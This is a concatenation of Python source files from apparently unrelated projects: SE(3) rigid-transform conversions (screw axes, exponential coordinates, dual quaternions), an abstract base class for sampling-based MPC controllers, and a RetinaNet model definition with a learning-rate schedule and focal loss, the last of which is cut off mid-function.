    screw_axis : array, shape (6,)
        Screw axis described by 6 values
        (omega_1, omega_2, omega_3, v_1, v_2, v_3),
        where the first 3 components are related to rotation and the last 3
        components are related to translation.
    """
    screw_matrix = check_screw_matrix(screw_matrix)
    # Rotational part: recover omega from the skew-symmetric block.
    omega = np.array([screw_matrix[2, 1], screw_matrix[0, 2],
                      screw_matrix[1, 0]])
    # Translational part lives in the last column.
    return np.hstack((omega, screw_matrix[:3, 3]))
def exponential_coordinates_from_screw_axis(screw_axis, theta):
    """Compute exponential coordinates from screw axis and theta.

    Parameters
    ----------
    screw_axis : array-like, shape (6,)
        Screw axis described by 6 values
        (omega_1, omega_2, omega_3, v_1, v_2, v_3),
        where the first 3 components are related to rotation and the last 3
        components are related to translation.
    theta : float
        Parameter of the transformation: theta is the angle of rotation
        and h * theta the translation.

    Returns
    -------
    Stheta : array, shape (6,)
        Exponential coordinates of transformation:
        S * theta = (omega_1, omega_2, omega_3, v_1, v_2, v_3) * theta,
        where the first 3 components are related to rotation and the last 3
        components are related to translation. Theta is the rotation angle
        and h * theta the translation. Theta should be >= 0. Negative rotations
        will be represented by a negative screw axis instead. This is relevant
        if you want to recover theta from exponential coordinates.
    """
    # Exponential coordinates are simply the (validated) screw axis scaled
    # by theta.
    return theta * check_screw_axis(screw_axis)
def exponential_coordinates_from_transform_log(transform_log, check=True):
    """Compute exponential coordinates from logarithm of transformation.

    Parameters
    ----------
    transform_log : array-like, shape (4, 4)
        Matrix logarithm of transformation matrix: [S] * theta.
    check : bool, optional (default: True)
        Check if logarithm of transformation is valid

    Returns
    -------
    Stheta : array, shape (6,)
        Exponential coordinates of transformation:
        S * theta = (omega_1, omega_2, omega_3, v_1, v_2, v_3) * theta,
        where S is the screw axis, the first 3 components are related to
        rotation and the last 3 components are related to translation.
        Theta is the rotation angle and h * theta the translation.
    """
    if check:
        transform_log = check_transform_log(transform_log)
    # omega*theta comes from the skew-symmetric rotation block, v*theta
    # from the last column.
    return np.r_[transform_log[2, 1], transform_log[0, 2],
                 transform_log[1, 0], transform_log[:3, 3]]
def exponential_coordinates_from_transform(A2B, strict_check=True, check=True):
    """Compute exponential coordinates from transformation matrix.

    Logarithmic map.

    Parameters
    ----------
    A2B : array-like, shape (4, 4)
        Transformation matrix from frame A to frame B
    strict_check : bool, optional (default: True)
        Raise a ValueError if the transformation matrix is not numerically
        close enough to a real transformation matrix. Otherwise we print a
        warning.
    check : bool, optional (default: True)
        Check if transformation matrix is valid
    Returns
    -------
    Stheta : array, shape (6,)
        Exponential coordinates of transformation:
        S * theta = (omega_1, omega_2, omega_3, v_1, v_2, v_3) * theta,
        where S is the screw axis, the first 3 components are related to
        rotation and the last 3 components are related to translation.
        Theta is the rotation angle and h * theta the translation.
    """
    if check:
        A2B = check_transform(A2B, strict_check=strict_check)
    R = A2B[:3, :3]
    p = A2B[:3, 3]
    # Rotation block is (numerically) the identity: pure translation, whose
    # exponential coordinates are simply (0, 0, 0, p).
    if np.linalg.norm(np.eye(3) - R) < np.finfo(float).eps:
        return np.r_[0.0, 0.0, 0.0, p]
    omega_theta = axis_angle_from_matrix(R, check=check)
    omega_unit = omega_theta[:3]
    theta = omega_theta[3]
    # Degenerate axis-angle result (angle 0): also pure translation.
    if theta == 0:
        return np.r_[0.0, 0.0, 0.0, p]
    omega_unit_matrix = cross_product_matrix(omega_unit)
    # Closed-form inverse of the G(theta) matrix of the SE(3) exponential
    # map (cf. Lynch & Park, "Modern Robotics", eq. 3.92); it maps the
    # translation p back to the screw's linear component v.
    G_inv = (np.eye(3) / theta - 0.5 * omega_unit_matrix
             + (1.0 / theta - 0.5 / np.tan(theta / 2.0))
             * np.dot(omega_unit_matrix, omega_unit_matrix))
    v = G_inv.dot(p)
    # Scale the unit screw axis (omega_unit, v) by theta.
    return np.hstack((omega_unit, v)) * theta
def screw_matrix_from_screw_axis(screw_axis):
    """Compute screw matrix from screw axis.

    Parameters
    ----------
    screw_axis : array-like, shape (6,)
        Screw axis described by 6 values
        (omega_1, omega_2, omega_3, v_1, v_2, v_3),
        where the first 3 components are related to rotation and the last 3
        components are related to translation.

    Returns
    -------
    screw_matrix : array, shape (4, 4)
        A screw matrix consists of a cross-product matrix that represents an
        axis of rotation, a translation, and a row of zeros.
    """
    screw_axis = check_screw_axis(screw_axis)
    screw_matrix = np.zeros((4, 4))
    # Upper-left block: cross-product (skew) matrix of the rotational part.
    screw_matrix[:3, :3] = cross_product_matrix(screw_axis[:3])
    # Last column: translational part; the bottom row stays all zeros.
    screw_matrix[:3, 3] = screw_axis[3:]
    return screw_matrix
def screw_matrix_from_transform_log(transform_log):
    """Compute screw matrix and theta from logarithm of transformation.

    Parameters
    ----------
    transform_log : array-like, shape (4, 4)
        Matrix logarithm of transformation matrix: [S] * theta.
    Returns
    -------
    screw_matrix : array, shape (4, 4)
        A screw matrix consists of a cross-product matrix that represents an
        axis of rotation, a translation, and a row of zeros.
    theta : float
        Parameter of the transformation: theta is the angle of rotation
        and h * theta the translation.
    """
    transform_log = check_transform_log(transform_log)
    # Recover omega * theta from the skew-symmetric rotation block.
    omega = np.array([
        transform_log[2, 1], transform_log[0, 2], transform_log[1, 0]])
    theta = np.linalg.norm(omega)
    # No rotation: take theta from the translation magnitude instead.
    if abs(theta) < np.finfo(float).eps:
        theta = np.linalg.norm(transform_log[:3, 3])
    # Identity transformation: no unique screw matrix exists.
    if abs(theta) < np.finfo(float).eps:
        return np.zeros((4, 4)), 0.0
    return transform_log / theta, theta
def transform_log_from_exponential_coordinates(Stheta):
    """Compute matrix logarithm of transformation from exponential coordinates.

    Parameters
    ----------
    Stheta : array-like, shape (6,)
        Exponential coordinates of transformation:
        S * theta = (omega_1, omega_2, omega_3, v_1, v_2, v_3) * theta,
        where S is the screw axis, the first 3 components are related to
        rotation and the last 3 components are related to translation.
        Theta is the rotation angle and h * theta the translation.

    Returns
    -------
    transform_log : array, shape (4, 4)
        Matrix logarithm of transformation matrix: [S] * theta.
    """
    # Keep the validated/converted array returned by the check. The previous
    # version discarded the return value, unlike every sibling function
    # (e.g. screw_axis_from_exponential_coordinates), so any conversion or
    # normalization performed by the check was silently lost.
    Stheta = check_exponential_coordinates(Stheta)
    omega = Stheta[:3]
    v = Stheta[3:]
    transform_log = np.zeros((4, 4))
    # Upper-left block: cross-product (skew) matrix of omega * theta.
    transform_log[:3, :3] = cross_product_matrix(omega)
    # Last column: v * theta; the bottom row stays all zeros.
    transform_log[:3, 3] = v
    return transform_log
def transform_log_from_screw_matrix(screw_matrix, theta):
    """Compute matrix logarithm of transformation from screw matrix and theta.

    Parameters
    ----------
    screw_matrix : array-like, shape (4, 4)
        A screw matrix consists of a cross-product matrix that represents an
        axis of rotation, a translation, and a row of zeros.
    theta : float
        Parameter of the transformation: theta is the angle of rotation
        and h * theta the translation.

    Returns
    -------
    transform_log : array, shape (4, 4)
        Matrix logarithm of transformation matrix: [S] * theta.
    """
    # The log is simply the (validated) screw matrix scaled by theta.
    return theta * check_screw_matrix(screw_matrix)
def transform_log_from_transform(A2B, strict_check=True):
    """Compute matrix logarithm of transformation from transformation.

    Parameters
    ----------
    A2B : array, shape (4, 4)
        Transform from frame A to frame B
    strict_check : bool, optional (default: True)
        Raise a ValueError if the transformation matrix is not numerically
        close enough to a real transformation matrix. Otherwise we print a
        warning.
    Returns
    -------
    transform_log : array, shape (4, 4)
        Matrix logarithm of transformation matrix: [S] * theta.
    """
    A2B = check_transform(A2B, strict_check=strict_check)
    R = A2B[:3, :3]
    p = A2B[:3, 3]
    transform_log = np.zeros((4, 4))
    # Pure translation: zero rotation block, p in the last column.
    if np.linalg.norm(np.eye(3) - R) < np.finfo(float).eps:
        transform_log[:3, 3] = p
        return transform_log
    omega_theta = axis_angle_from_matrix(R)
    omega_unit = omega_theta[:3]
    theta = omega_theta[3]
    if theta == 0:
        # NOTE(review): in this degenerate branch the translation p is
        # dropped and the all-zero log is returned, unlike the branch above
        # which keeps p — confirm this asymmetry is intended.
        return transform_log
    omega_unit_matrix = cross_product_matrix(omega_unit)
    # Closed-form inverse of the G(theta) matrix of the SE(3) exponential
    # map (cf. Lynch & Park, "Modern Robotics"); recovers v from p.
    G_inv = (np.eye(3) / theta - 0.5 * omega_unit_matrix
             + (1.0 / theta - 0.5 / np.tan(theta / 2.0))
             * np.dot(omega_unit_matrix, omega_unit_matrix))
    v = G_inv.dot(p)
    transform_log[:3, :3] = omega_unit_matrix
    transform_log[:3, 3] = v
    # Scale [S] by theta to obtain [S] * theta.
    transform_log *= theta
    return transform_log
def transform_from_exponential_coordinates(Stheta, check=True):
    """Compute transformation matrix from exponential coordinates.

    Exponential map.

    Parameters
    ----------
    Stheta : array-like, shape (6,)
        Exponential coordinates of transformation:
        S * theta = (omega_1, omega_2, omega_3, v_1, v_2, v_3) * theta,
        where S is the screw axis, the first 3 components are related to
        rotation and the last 3 components are related to translation.
        Theta is the rotation angle and h * theta the translation.
    check : bool, optional (default: True)
        Check if exponential coordinates are valid
    Returns
    -------
    A2B : array, shape (4, 4)
        Transformation matrix from frame A to frame B
    """
    if check:
        Stheta = check_exponential_coordinates(Stheta)
    omega_theta = Stheta[:3]
    theta = np.linalg.norm(omega_theta)
    if theta == 0.0:  # only translation
        return translate_transform(np.eye(4), Stheta[3:], check=check)
    # Normalize to obtain the unit screw axis and split it into its
    # rotational (omega_unit) and translational (v) parts.
    screw_axis = Stheta / theta
    omega_unit = screw_axis[:3]
    v = screw_axis[3:]
    A2B = np.eye(4)
    A2B[:3, :3] = matrix_from_axis_angle(np.r_[omega_unit, theta])
    omega_matrix = cross_product_matrix(omega_unit)
    # Translation via the G(theta) matrix of the SE(3) exponential map:
    # G = I*theta + (1 - cos(theta))*[omega] + (theta - sin(theta))*[omega]^2
    # (cf. Lynch & Park, "Modern Robotics").
    A2B[:3, 3] = np.dot(
        np.eye(3) * theta
        + (1.0 - math.cos(theta)) * omega_matrix
        + (theta - math.sin(theta)) * np.dot(omega_matrix, omega_matrix),
        v)
    return A2B
def transform_from_transform_log(transform_log):
    """Compute transformation from matrix logarithm of transformation.

    Parameters
    ----------
    transform_log : array-like, shape (4, 4)
        Matrix logarithm of transformation matrix: [S] * theta.
    Returns
    -------
    A2B : array, shape (4, 4)
        Transform from frame A to frame B
    """
    transform_log = check_transform_log(transform_log)
    # Extract omega*theta from the skew-symmetric rotation block and
    # v*theta from the last column.
    omega_theta = np.array([
        transform_log[2, 1], transform_log[0, 2], transform_log[1, 0]])
    v = transform_log[:3, 3]
    theta = np.linalg.norm(omega_theta)
    if theta == 0.0:  # only translation
        return translate_transform(np.eye(4), v)
    # Normalize by theta to obtain the unit screw quantities.
    omega_unit = omega_theta / theta
    v = v / theta
    A2B = np.eye(4)
    A2B[:3, :3] = matrix_from_axis_angle(np.r_[omega_unit, theta])
    # Skew matrix of the unit rotation axis, reused from the input log.
    omega_unit_matrix = transform_log[:3, :3] / theta
    # G(theta) of the SE(3) exponential map converts v into the translation
    # (cf. Lynch & Park, "Modern Robotics").
    G = (np.eye(3) * theta
         + (1.0 - math.cos(theta)) * omega_unit_matrix
         + (theta - math.sin(theta)) * np.dot(omega_unit_matrix,
                                              omega_unit_matrix))
    A2B[:3, 3] = np.dot(G, v)
    return A2B
def dual_quaternion_from_transform(A2B):
    """Compute dual quaternion from transformation matrix.

    Parameters
    ----------
    A2B : array-like, shape (4, 4)
        Transform from frame A to frame B

    Returns
    -------
    dq : array, shape (8,)
        Unit dual quaternion to represent transform:
        (pw, px, py, pz, qw, qx, qy, qz)
    """
    A2B = check_transform(A2B)
    real = quaternion_from_matrix(A2B[:3, :3])
    # The dual part encodes the translation: 0.5 * (0, p) * real.
    pure_translation = np.r_[0, A2B[:3, 3]]
    dual = 0.5 * concatenate_quaternions(pure_translation, real)
    return np.hstack((real, dual))
def dual_quaternion_from_pq(pq):
    """Compute dual quaternion from position and quaternion.

    Parameters
    ----------
    pq : array-like, shape (7,)
        Position and orientation quaternion: (x, y, z, qw, qx, qy, qz)

    Returns
    -------
    dq : array, shape (8,)
        Unit dual quaternion to represent transform:
        (pw, px, py, pz, qw, qx, qy, qz)
    """
    pq = check_pq(pq)
    real = pq[3:]
    # The dual part encodes the translation: 0.5 * (0, p) * real.
    pure_translation = np.r_[0, pq[:3]]
    dual = 0.5 * concatenate_quaternions(pure_translation, real)
    return np.hstack((real, dual))
def dual_quaternion_from_screw_parameters(q, s_axis, h, theta):
    """Compute dual quaternion from screw parameters.

    Parameters
    ----------
    q : array-like, shape (3,)
        Vector to a point on the screw axis
    s_axis : array-like, shape (3,)
        Direction vector of the screw axis
    h : float
        Pitch of the screw. The pitch is the ratio of translation and rotation
        of the screw axis. Infinite pitch indicates pure translation.
    theta : float
        Parameter of the transformation: theta is the angle of rotation
        and h * theta the translation.

    Returns
    -------
    dq : array, shape (8,)
        Unit dual quaternion to represent transform:
        (pw, px, py, pz, qw, qx, qy, qz)
    """
    q, s_axis, h = check_screw_parameters(q, s_axis, h)
    if np.isinf(h):
        # Pure translation: all displacement goes into d, no rotation.
        d, theta = theta, 0
    else:
        d = h * theta
    moment = np.cross(q, s_axis)
    half_distance = 0.5 * d
    sin_half = np.sin(0.5 * theta)
    cos_half = np.cos(0.5 * theta)
    # Assemble (real_w, real_vec, dual_w, dual_vec).
    return np.r_[cos_half,
                 sin_half * s_axis,
                 -half_distance * sin_half,
                 sin_half * moment + half_distance * cos_half * s_axis]
def transform_from_dual_quaternion(dq):
    """Compute transformation matrix from dual quaternion.

    Parameters
    ----------
    dq : array-like, shape (8,)
        Unit dual quaternion to represent transform:
        (pw, px, py, pz, qw, qx, qy, qz)

    Returns
    -------
    A2B : array, shape (4, 4)
        Transform from frame A to frame B
    """
    dq = check_dual_quaternion(dq)
    real, dual = dq[:4], dq[4:]
    rotation = matrix_from_quaternion(real)
    # Translation is the vector part of 2 * dual * conj(real).
    translation = 2 * concatenate_quaternions(dual, q_conj(real))[1:]
    return transform_from(R=rotation, p=translation)
def pq_from_dual_quaternion(dq):
    """Compute position and quaternion from dual quaternion.

    Parameters
    ----------
    dq : array-like, shape (8,)
        Unit dual quaternion to represent transform:
        (pw, px, py, pz, qw, qx, qy, qz)

    Returns
    -------
    pq : array, shape (7,)
        Position and orientation quaternion: (x, y, z, qw, qx, qy, qz)
    """
    dq = check_dual_quaternion(dq)
    real, dual = dq[:4], dq[4:]
    # Position is the vector part of 2 * dual * conj(real).
    position = 2 * concatenate_quaternions(dual, q_conj(real))[1:]
    return np.hstack((position, real))
def screw_parameters_from_dual_quaternion(dq):
    """Compute screw parameters from dual quaternion.

    Parameters
    ----------
    dq : array-like, shape (8,)
        Unit dual quaternion to represent transform:
        (pw, px, py, pz, qw, qx, qy, qz)

    Returns
    -------
    q : array, shape (3,)
        Vector to a point on the screw axis
    s_axis : array, shape (3,)
        Direction vector of the screw axis
    h : float
        Pitch of the screw. The pitch is the ratio of translation and rotation
        of the screw axis. Infinite pitch indicates pure translation.
    theta : float
        Parameter of the transformation: theta is the angle of rotation
        and h * theta the translation.
    """
    dq = check_dual_quaternion(dq, unit=True)
    real, dual = dq[:4], dq[4:]
    a = axis_angle_from_quaternion(real)
    s_axis = a[:3]
    theta = a[3]
    # Translation is the vector part of 2 * dual * conj(real).
    translation = 2 * concatenate_quaternions(dual, q_conj(real))[1:]
    if abs(theta) >= np.finfo(float).eps:
        # General screw motion with rotation.
        distance = np.dot(translation, s_axis)
        moment = 0.5 * (np.cross(translation, s_axis) +
                        (translation - distance * s_axis)
                        / np.tan(0.5 * theta))
        point = np.cross(s_axis, moment)
        return point, s_axis, distance / theta, theta
    # Pure translation: direction comes from the translation vector and
    # theta is its magnitude; the pitch is infinite.
    d = np.linalg.norm(translation)
    if d < np.finfo(float).eps:
        # Identity transform: pick an arbitrary axis.
        s_axis = np.array([1, 0, 0])
    else:
        s_axis = translation / d
    return np.zeros(3), s_axis, np.inf, d
def adjoint_from_transform(A2B, strict_check=True, check=True):
    """Compute adjoint representation of a transformation matrix.

    The adjoint representation of a transformation
    :math:`\\left[Ad_{\\boldsymbol{T}_{BA}}\\right]`
    from frame A to frame B translates a twist from frame A to frame B
    through the adjoint map

    .. math::

        \\mathcal{V}_{B}
        = \\left[Ad_{\\boldsymbol{T}_{BA}}\\right] \\mathcal{V}_A

    The corresponding matrix form is

    .. math::

        \\left[\\mathcal{V}_{B}\\right]
        = \\boldsymbol{T}_{BA} \\left[\\mathcal{V}_A\\right]
        \\boldsymbol{T}_{BA}^{-1}

    We can also use the adjoint representation to transform a wrench from frame
    A to frame B:

    .. math::

        \\mathcal{F}_B
        = \\left[ Ad_{\\boldsymbol{T}_{AB}} \\right]^T \\mathcal{F}_A

    Note that not only the adjoint is transposed but also the transformation is
    inverted.

    Adjoint representations have the following properties:

    .. math::

        \\left[Ad_{\\boldsymbol{T}_1 \\boldsymbol{T}_2}\\right]
        = \\left[Ad_{\\boldsymbol{T}_1}\\right]
        \\left[Ad_{\\boldsymbol{T}_2}\\right]

    .. math::

        \\left[Ad_{\\boldsymbol{T}}\\right]^{-1} =
        \\left[Ad_{\\boldsymbol{T}^{-1}}\\right]

    Parameters
    ----------
    A2B : array-like, shape (4, 4)
        Transform from frame A to frame B
    strict_check : bool, optional (default: True)
        Raise a ValueError if the transformation matrix is not numerically
        close enough to a real transformation matrix. Otherwise we print a
        warning.
    check : bool, optional (default: True)
        Check if transformation matrix is valid

    Returns
    -------
    adj_A2B : array, shape (6, 6)
        Adjoint representation of transformation matrix
    """
    if check:
        A2B = check_transform(A2B, strict_check)
    rotation = A2B[:3, :3]
    translation = A2B[:3, 3]
    # Block structure: [[R, 0], [[p]x R, R]].
    adj_A2B = np.zeros((6, 6))
    adj_A2B[:3, :3] = rotation
    adj_A2B[3:, 3:] = rotation
    adj_A2B[3:, :3] = cross_product_matrix(translation).dot(rotation)
    return adj_A2B
def norm_exponential_coordinates(Stheta):
    """Normalize exponential coordinates of transformation.

    Parameters
    ----------
    Stheta : array-like, shape (6,)
        Exponential coordinates of transformation:
        S * theta = (omega_1, omega_2, omega_3, v_1, v_2, v_3) * theta,
        where the first 3 components are related to rotation and the last 3
        components are related to translation. Theta is the rotation angle
        and h * theta the translation. Theta should be >= 0. Negative rotations
        will be represented by a negative screw axis instead. This is relevant
        if you want to recover theta from exponential coordinates.
    Returns
    -------
    Stheta : array, shape (6,)
        Normalized exponential coordinates of transformation with theta in
        [0, pi]. Note that in the case of pure translation no normalization
        is required because the representation is unique. In the case of
        rotation by pi, there is an ambiguity that will be resolved so that
        the screw pitch is positive.
    """
    theta = np.linalg.norm(Stheta[:3])
    if theta == 0.0:
        # Pure translation is already a unique representation.
        return Stheta
    screw_axis = Stheta / theta
    q, s_axis, h = screw_parameters_from_screw_axis(screw_axis)
    # NOTE(review): `eps` is a module-level name defined elsewhere in this
    # file (presumably np.finfo(float).eps) — confirm.
    if abs(theta - np.pi) < eps and h < 0:
        # Rotation by pi leaves the axis sign ambiguous; resolve the
        # ambiguity so that the screw pitch ends up positive.
        h *= -1.0
        s_axis *= -1.0
    theta_normed = norm_angle(theta)
    # Rescale the pitch so that the translation h * theta is preserved
    # under the normalized angle.
    h_normalized = h * theta / theta_normed
    screw_axis = screw_axis_from_screw_parameters(q, s_axis, h_normalized)
    return screw_axis * theta_normed
|
#!/usr/bin/env python
"""
Base class for controllers
Author - <NAME>
Date: 3 Jan, 2020
"""
from abc import ABC, abstractmethod
import copy
from gym.utils import seeding
import numpy as np
from mjmpc.utils import helpers
class Controller(ABC):
    """Abstract base class for sampling-based MPC controllers.

    Subclasses maintain a control distribution over action sequences and
    implement the sampling / update / shift primitives that are orchestrated
    by :meth:`optimize`.
    """

    def __init__(self,
                 d_state,
                 d_obs,
                 d_action,
                 action_lows,
                 action_highs,
                 horizon,
                 gamma,
                 n_iters,
                 set_sim_state_fn=None,
                 rollout_fn=None,
                 sample_mode='mean',
                 batch_size=1,
                 seed=0):
        """
        Parameters
        ----------
        d_state : int
            size of state space
        d_obs : int
            size of observation space
        d_action : int
            size of action space
        action_lows : np.ndarray
            lower limits for each action dim
        action_highs : np.ndarray
            upper limits for each action dim
        horizon : int
            horizon of rollouts
        gamma : float
            discount factor
        n_iters : int
            number of optimization iterations per call to optimize()
        set_sim_state_fn : function
            set state of simulator using input
        rollout_fn : function
            rollout policy (or actions) in simulator and return resulting
            trajectories
        sample_mode : {'mean', 'sample'}
            how to choose action to be executed
            'mean' plays the first mean action and
            'sample' samples from the distribution
        batch_size : int
            optimize for a batch of states
        seed : int
            seed value for the internal random number generator
        """
        self.d_state = d_state
        self.d_obs = d_obs
        self.d_action = d_action
        self.action_lows = action_lows
        self.action_highs = action_highs
        self.horizon = horizon
        self.gamma = gamma
        # Discount sequence [1, gamma, gamma^2, ...] with shape (1, horizon)
        # so it broadcasts against batches of per-step costs.
        self.gamma_seq = np.cumprod([1.0] + [self.gamma] * (horizon - 1)).reshape(1, horizon)
        self.n_iters = n_iters
        self._set_sim_state_fn = set_sim_state_fn
        self._rollout_fn = rollout_fn
        self.sample_mode = sample_mode
        self.batch_size = batch_size
        self.num_steps = 0
        self.seed_val = self.seed(seed)

    @abstractmethod
    def _get_next_action(self, state, mode='mean'):
        """
        Get action to execute on the system based
        on current control distribution.

        Note: the signature includes ``state`` so that it matches the call
        in :meth:`optimize` (the previous abstract declaration omitted it).

        Parameters
        ----------
        state :
            current state the action is computed for
        mode : {'mean', 'sample'}
            how to choose action to be executed
            'mean' plays the first mean action and
            'sample' samples from the distribution
        """
        pass

    def sample_actions(self):
        """
        Sample actions from current control distribution
        """
        raise NotImplementedError('sample_actions function not implemented')

    @abstractmethod
    def _update_distribution(self, trajectories):
        """
        Update current control distribution using
        rollout trajectories

        Parameters
        ----------
        trajectories : dict
            Rollout trajectories. Contains the following fields
            observations : np.ndarray ()
                observations along rollouts
            actions : np.ndarray
                actions sampled from control distribution along rollouts
            costs : np.ndarray
                step costs along rollouts
            dones : np.ndarray
                bool signalling end of episode
        """
        pass

    @abstractmethod
    def _shift(self):
        """
        Shift the current control distribution
        to hotstart the next timestep
        """
        pass

    @abstractmethod
    def reset(self):
        """
        Reset the controller
        """
        pass

    @abstractmethod
    def _calc_val(self, trajectories):
        """
        Calculate value of state given rollout trajectories from a policy.

        Note: the signature takes the trajectories dict so that it matches
        the call in :meth:`optimize` (the previous abstract declaration
        took separate cost/action sequences).
        """
        pass

    def check_convergence(self):
        """
        Checks if controller has converged
        Returns False by default
        """
        return False

    @property
    def set_sim_state_fn(self):
        """Function used to set the simulation environment to a state."""
        return self._set_sim_state_fn

    @set_sim_state_fn.setter
    def set_sim_state_fn(self, fn):
        """
        Set function that sets the simulation
        environment to a particular state
        """
        self._set_sim_state_fn = fn

    @property
    def rollout_fn(self):
        """Function used to roll out actions in the simulator."""
        return self._rollout_fn

    @rollout_fn.setter
    def rollout_fn(self, fn):
        """
        Set the rollout function from
        input function pointer
        """
        self._rollout_fn = fn

    @abstractmethod
    def generate_rollouts(self, state):
        """
        Roll out a batch of action sequences from the given state and
        return the resulting trajectories.

        Parameters
        ----------
        state : dict or np.ndarray
            Initial state to set the simulation env to
        """
        pass

    def optimize(self, state, calc_val=False, hotstart=True):
        """
        Optimize for best action at current state

        Parameters
        ----------
        state :
            state to calculate optimal action from
        calc_val : bool
            If true, calculate the optimal value estimate
            of the state along with action
        hotstart : bool
            If true, shift the control distribution after optimizing
            to warm-start the next timestep

        Returns
        -------
        action : np.ndarray
            action to execute at the current state
        value : float
            optimal value estimate of the state (0.0 unless calc_val is True)
        """
        for _ in range(self.n_iters):
            # generate random simulated trajectories
            trajectory = self.generate_rollouts(copy.deepcopy(state))
            # update distribution parameters
            self._update_distribution(trajectory)
            # check if converged
            if self.check_convergence():
                break
        # calculate best action
        curr_action = self._get_next_action(state, mode=self.sample_mode)
        # calculate optimal value estimate if required
        value = 0.0
        if calc_val:
            trajectories = self.generate_rollouts(copy.deepcopy(state))
            value = self._calc_val(trajectories)
        self.num_steps += 1
        if hotstart:
            # shift distribution to hotstart next timestep
            self._shift()
        return curr_action, value

    def get_optimal_value(self, state):
        """
        Calculate optimal value of a state, i.e
        value under optimal policy.

        Parameters
        ----------
        state : dict or np.ndarray
            state to calculate optimal value estimate for
        Returns
        -------
        value : float
            optimal value estimate of the state
        """
        self.reset()  # reset the control distribution
        _, value = self.optimize(state, calc_val=True, hotstart=False)
        return value

    def seed(self, seed=None):
        """Seed the internal numpy random state and return the seed used."""
        self.np_random, seed = seeding.np_random(seed)
        return seed
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Model definition for the RetinaNet Model.
Defines model_fn of RetinaNet for TF Estimator. The model_fn includes RetinaNet
model architecture, loss function, learning rate schedule, and evaluation
procedure.
<NAME>, <NAME>, <NAME>, <NAME>, and <NAME>
Focal Loss for Dense Object Detection. arXiv:1708.02002
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import anchors
import coco_metric
import postprocess
import retinanet_architecture
from tensorflow.contrib import tpu as contrib_tpu
from tensorflow.contrib import training as contrib_training
# Reference batch size the default hyperparameters are tuned for; the
# learning-rate schedule is scaled linearly relative to this value
# (see update_learning_rate_schedule_parameters).
_DEFAULT_BATCH_SIZE = 64
# L2 regularization coefficient — presumably applied to model weights in
# the loss, defined later in this file (not visible here).
_WEIGHT_DECAY = 1e-4
def update_learning_rate_schedule_parameters(params):
  """Updates params that are related to the learning rate schedule.

  Converts the epoch-based LR-schedule hyperparameters (specified in
  default_hparams() w.r.t. a batch size of 64 and the COCO dataset) into
  step-based values for the actual training batch size. The learning rate is
  scaled linearly with the batch size, and each *_epoch parameter is turned
  into the corresponding global-step count.

  For batch size=64 the defaults
    learning_rate=0.08, lr_warmup_epoch=1.0,
    first_lr_drop_epoch=8.0, second_lr_drop_epoch=11.0
  become
    adjusted_learning_rate=0.08, lr_warmup_step=1875,
    first_lr_drop_step=15000, second_lr_drop_step=20625.
  For batch size=8 the same defaults yield
    adjusted_learning_rate=0.01, lr_warmup_step=15000,
    first_lr_drop_step=120000, second_lr_drop_step=165000;
  for batch size=256 they yield
    adjusted_learning_rate=0.32, lr_warmup_step=468,
    first_lr_drop_step=3750, second_lr_drop_step=5157.
  For other schedules (e.g. a 2x schedule with doubled *_lr_drop_epoch
  values), adjust the values in default_hparams(); they are always
  interpreted w.r.t. a batch size of 64.

  Args:
    params: a parameter dictionary that includes learning_rate,
      lr_warmup_epoch, first_lr_drop_epoch, and second_lr_drop_epoch.
  """
  # params['batch_size'] is per-shard within model_fn if use_tpu=true, so
  # the global batch size is batch_size * num_shards in that case.
  if params['use_tpu']:
    global_batch_size = params['batch_size'] * params['num_shards']
  else:
    global_batch_size = params['batch_size']
  # Learning rate is proportional to the (global) batch size.
  params['adjusted_learning_rate'] = (
      params['learning_rate'] * global_batch_size / _DEFAULT_BATCH_SIZE)
  steps_per_epoch = params['num_examples_per_epoch'] / global_batch_size
  # Convert each epoch-based milestone into a global-step milestone.
  for name in ('lr_warmup', 'first_lr_drop', 'second_lr_drop'):
    params[name + '_step'] = int(params[name + '_epoch'] * steps_per_epoch)
def learning_rate_schedule(adjusted_learning_rate, lr_warmup_init,
                           lr_warmup_step, first_lr_drop_step,
                           second_lr_drop_step, global_step):
  """Builds the LR tensor: linear warmup followed by stepwise decay.

  The learning rate ramps linearly from `lr_warmup_init` to
  `adjusted_learning_rate` over the first `lr_warmup_step` steps, then is
  multiplied by 0.1 at `first_lr_drop_step` and by 0.01 at
  `second_lr_drop_step`.
  """
  # Fraction of the warmup window elapsed so far. Values past 1.0 are
  # irrelevant: tf.where below discards the warmup branch after warmup ends.
  warmup_fraction = tf.cast(global_step, dtype=tf.float32) / lr_warmup_step
  warmup_lr = lr_warmup_init + warmup_fraction * (
      adjusted_learning_rate - lr_warmup_init)
  learning_rate = tf.where(global_step < lr_warmup_step, warmup_lr,
                           adjusted_learning_rate)
  # Apply each decay multiplier once its boundary step has been reached.
  for multiplier, boundary in ((1.0, lr_warmup_step),
                               (0.1, first_lr_drop_step),
                               (0.01, second_lr_drop_step)):
    learning_rate = tf.where(global_step < boundary, learning_rate,
                             adjusted_learning_rate * multiplier)
  return learning_rate
def focal_loss(logits, targets, alpha, gamma, normalizer):
  """Compute the focal loss between `logits` and the golden `target` values.

  Focal loss = -(1-pt)^gamma * log(pt), where pt is the probability of being
  classified to the true class.

  Args:
    logits: A float32 tensor of size [batch, height_in, width_in,
      num_predictions].
    targets: A float32 tensor of size [batch, height_in, width_in,
      num_predictions].
    alpha: A float32 scalar multiplying alpha to the loss from positive
      examples and (1-alpha) to the loss from negative examples.
    gamma: A float32 scalar modulating loss from hard and easy examples.
    normalizer: A float32 scalar normalizing the total loss from all examples.

  Returns:
    A float32 scalar representing the normalized total loss.
  """
  with tf.name_scope('focal_loss'):
    is_positive = tf.equal(targets, 1.0)
    ce = tf.nn.sigmoid_cross_entropy_with_logits(labels=targets, logits=logits)
    pred_prob = tf.sigmoid(logits)
    # pt: probability the model assigns to the ground-truth class.
    pt = tf.where(is_positive, pred_prob, 1.0 - pred_prob)
    # With small gamma, this power can produce NaN during back prop.
    focal_weight = tf.pow(1.0 - pt, gamma)
    per_entry_loss = focal_weight * ce
    # alpha balances the contribution of positive vs. negative examples.
    alpha_weighted = tf.where(is_positive, alpha * per_entry_loss,
